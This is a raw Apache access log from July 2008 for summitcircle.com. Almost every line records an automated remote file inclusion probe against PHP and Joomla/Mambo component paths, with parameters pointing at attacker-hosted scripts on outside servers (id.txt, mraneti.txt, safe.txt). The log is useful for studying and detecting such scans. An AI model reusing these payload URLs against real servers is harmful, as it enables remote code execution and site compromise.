81.92.219.130 - - [27/Jul/2008:18:57:15 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
81.92.219.130 - - [27/Jul/2008:18:57:15 -0700] "GET //include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
81.92.219.130 - - [27/Jul/2008:18:57:32 -0700] "GET /logs/access_071001.log//include/write.php?dir=http://www.educsi.com.br/includes/Cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.summitcircle.com"
207.58.181.13 - - [27/Jul/2008:18:58:17 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://electrometro.com.ve/wall/xpl/tst?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:18:58:49 -0700] "GET /logs/access_080121.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:18:59:47 -0700] "GET /logs/access_070806.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:18:59:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.207.2.62 - - [27/Jul/2008:19:00:32 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.207.2.62 - - [27/Jul/2008:19:00:32 -0700] "GET //include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.207.2.62 - - [27/Jul/2008:19:00:33 -0700] "GET /logs//include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:00:47 -0700] "GET /logs/access_071210.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:00:48 -0700] "GET /logs/access_071210.log/lostpasswd.php?env[include_prefix]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:00:59 -0700] "GET /logs/access_080128.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:01:01 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:01:02 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.810" "www.summitcircle.com"
58.65.228.5 - - [27/Jul/2008:19:01:21 -0700] "GET /logs/access_070827.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:02:41 -0700] "GET /logs/access_071112.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
200.207.2.62 - - [27/Jul/2008:19:02:47 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
200.204.109.42 - - [27/Jul/2008:19:03:31 -0700] "GET /logs/access_071029.log//include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.204.109.42 - - [27/Jul/2008:19:03:32 -0700] "GET //include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.204.109.42 - - [27/Jul/2008:19:03:32 -0700] "GET /logs//include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:05:24 -0700] "GET /logs/access_080128.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:05:25 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:05:26 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:05:50 -0700] "GET /logs/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 10662 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:05:52 -0700] "GET /?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:37 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:37 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:38 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
200.204.109.42 - - [27/Jul/2008:19:06:38 -0700] "GET /logs/access_071022.log//include/write.php?dir=http://slam.magicshells.com/~hex/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:41 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:50 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:50 -0700] "GET //tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:53 -0700] "GET /logs/access_071224.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
59.125.211.84 - - [27/Jul/2008:19:06:54 -0700] "GET /logs/access_080120.log//tiny_includes/config.php?dir_ws=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:08:09 -0700] "GET /logs/access_071112.log/?sourcedir=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
207.235.90.6 - - [27/Jul/2008:19:09:19 -0700] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
207.235.90.6 - - [27/Jul/2008:19:09:19 -0700] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:10:16 -0700] "GET /logs/access_070820.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:10:45 -0700] "GET /logs/access_071022.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:10:45 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:10:45 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:19:11:20 -0700] "GET /logs//includes/header.php?c_temp_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:19:11:20 -0700] "GET //includes/header.php?c_temp_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
201.218.236.2 - - [27/Jul/2008:19:11:20 -0700] "GET /logs/access_080629.log//includes/header.php?c_temp_path=http://bellaushop.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:11:28 -0700] "GET /logs/access_080210.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:11:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:11:37 -0700] "GET /logs/access_071022.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:11:37 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:12:30 -0700] "GET /logs/access_080210.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.6.18.230 - - [27/Jul/2008:19:14:49 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
74.6.18.230 - - [27/Jul/2008:19:14:49 -0700] "GET /logs/access.log HTTP/1.0" 200 110711 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:15:19 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:15:19 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:15:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
207.210.115.114 - - [27/Jul/2008:19:15:26 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://lamer.newsit.es/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:16:32 -0700] "GET /logs/access_071001.log//cms/modules/form.lib.php?sourceFolder=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:16:32 -0700] "GET //cms/modules/form.lib.php?sourceFolder=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:16:32 -0700] "GET /logs//cms/modules/form.lib.php?sourceFolder=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
207.44.234.103 - - [27/Jul/2008:19:16:35 -0700] "GET /logs/access_080210.log%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:19:16:42 -0700] "GET /logs/access_080629.log//includes/header.php?c_temp_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:19:16:42 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:19:16:42 -0700] "GET //includes/header.php?c_temp_path=http://www.radiomorada.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:19:16:45 -0700] "GET /logs/access_080629.log//includes/header.php?c_temp_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:19:16:45 -0700] "GET /logs//includes/header.php?c_temp_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.233.85.46 - - [27/Jul/2008:19:16:45 -0700] "GET //includes/header.php?c_temp_path=http://www.freewebs.com/albgroup/1d/vid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:17:23 -0700] "GET /logs/access_071001.log//cms/modules/form.lib.php?sourceFolder=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:17:24 -0700] "GET //cms/modules/form.lib.php?sourceFolder=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:17:24 -0700] "GET /logs//cms/modules/form.lib.php?sourceFolder=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
219.94.128.213 - - [27/Jul/2008:19:18:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
219.94.128.213 - - [27/Jul/2008:19:18:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.summitcircle.com"
64.22.89.194 - - [27/Jul/2008:19:18:17 -0700] "GET /logs/access_080210.log%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
219.94.155.28 - - [27/Jul/2008:19:18:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
219.94.155.28 - - [27/Jul/2008:19:18:24 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.summitcircle.com"
219.94.162.56 - - [27/Jul/2008:19:18:28 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.summitcircle.com"
219.94.162.56 - - [27/Jul/2008:19:18:29 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:18:59 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
59.106.13.141 - - [27/Jul/2008:19:19:27 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
59.106.13.141 - - [27/Jul/2008:19:19:27 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:19:21:12 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:19:21:12 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:19:21:12 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:19:22:04 -0700] "GET /logs/access_070826.log//newspublish/include.php?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:19:22:04 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:19:22:10 -0700] "GET /logs/access_070826.log//newspublish/include.php?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:19:22:10 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:19:22:24 -0700] "GET /logs/access_080210.log//atom.php5?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:19:22:24 -0700] "GET //atom.php5?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:19:22:34 -0700] "GET /logs/access_080210.log//atom.php5?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:19:22:34 -0700] "GET //atom.php5?page=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:19:25:26 -0700] "GET /logs/access_080127.log//Neos_Chronos/header.php?base_folder=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
64.15.138.183 - - [27/Jul/2008:19:25:26 -0700] "GET //Neos_Chronos/header.php?base_folder=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:19:25:34 -0700] "GET /logs/access_080127.log//Neos_Chronos/header.php?base_folder=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
85.10.128.148 - - [27/Jul/2008:19:25:34 -0700] "GET //Neos_Chronos/header.php?base_folder=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
87.244.11.20 - - [27/Jul/2008:19:26:02 -0700] "GET /logs/access_080204.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.scriptsfeed.com/demos/auction_soft_1/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.85.147.82 - - [27/Jul/2008:19:27:41 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
70.85.147.82 - - [27/Jul/2008:19:27:41 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:31:12 -0700] "GET /logs/access_071217.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:31:13 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://201.70.9.109/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:32:35 -0700] "GET /logs/access_080421.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:32:38 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:32:40 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.72.200.170 - - [27/Jul/2008:19:33:40 -0700] "GET /logs/access_080616.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:34:08 -0700] "GET /logs/access_080210.log//atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
194.201.253.2 - - [27/Jul/2008:19:34:10 -0700] "GET //atom.php5?page=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
80.93.82.97 - - [27/Jul/2008:19:34:31 -0700] "GET //include/lib.inc.php?site_path=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
72.9.157.85 - - [27/Jul/2008:19:34:41 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://l1nuxgroup.by.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:35:58 -0700] "GET /logs/access_070826.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:35:58 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
210.245.87.117 - - [27/Jul/2008:19:35:59 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.111.8.239 - - [27/Jul/2008:19:37:19 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
219.111.8.239 - - [27/Jul/2008:19:37:22 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://asdf123.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.summitcircle.com"
64.38.22.250 - - [27/Jul/2008:19:38:00 -0700] "GET /logs/index.php?site=http://www.emark.sk/new/vnc/fastidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
